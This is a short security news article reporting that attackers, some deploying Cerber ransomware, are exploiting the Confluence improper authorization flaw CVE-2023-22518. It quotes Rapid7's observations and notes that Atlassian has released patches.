The critical improper authorization vulnerability in Atlassian Confluence Server and Data Center that emerged last week is attracting the attention of a variety of attackers, including some that are attempting to deploy the Cerber ransomware.
When Confluence warned of the vulnerability on Oct. 31, there were not yet any reports of active exploitation. But that changed quickly once information about the bug became public. Within a couple of days of the initial advisory, researchers began noticing a variety if exploitation attempts against the vulnerability (CVE-2023-22518), which affects all versions of the Confluence Server and Data Center products.
Over the weekend, researchers from Rapid7 began observing attackers trying to exploit the bug on both Windows and Linux machines.
“As of November 5, 2023, Rapid7 Managed Detection and Response (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, including for ransomware deployment. We have confirmed that at least some of the exploits are targeting CVE-2023-22518, an improper authorization vulnerability affecting Confluence Data Center and Confluence Server,” Rapid7 said in a post Monday.
“The process execution chain, for the most part, is consistent across multiple environments, indicating possible mass exploitation of vulnerable internet-facing Atlassian Confluence servers.”
In several instances, Rapid7 saw attackers download a malicious payload from a remote server after successful exploitation, and then deploy the Cerber ransomware on the compromised machine.
Atlassian has released updates to fix the vulnerability in all of the affected versions of Confluence Server and Data Center, and organizations should update immediately, given the active attacks.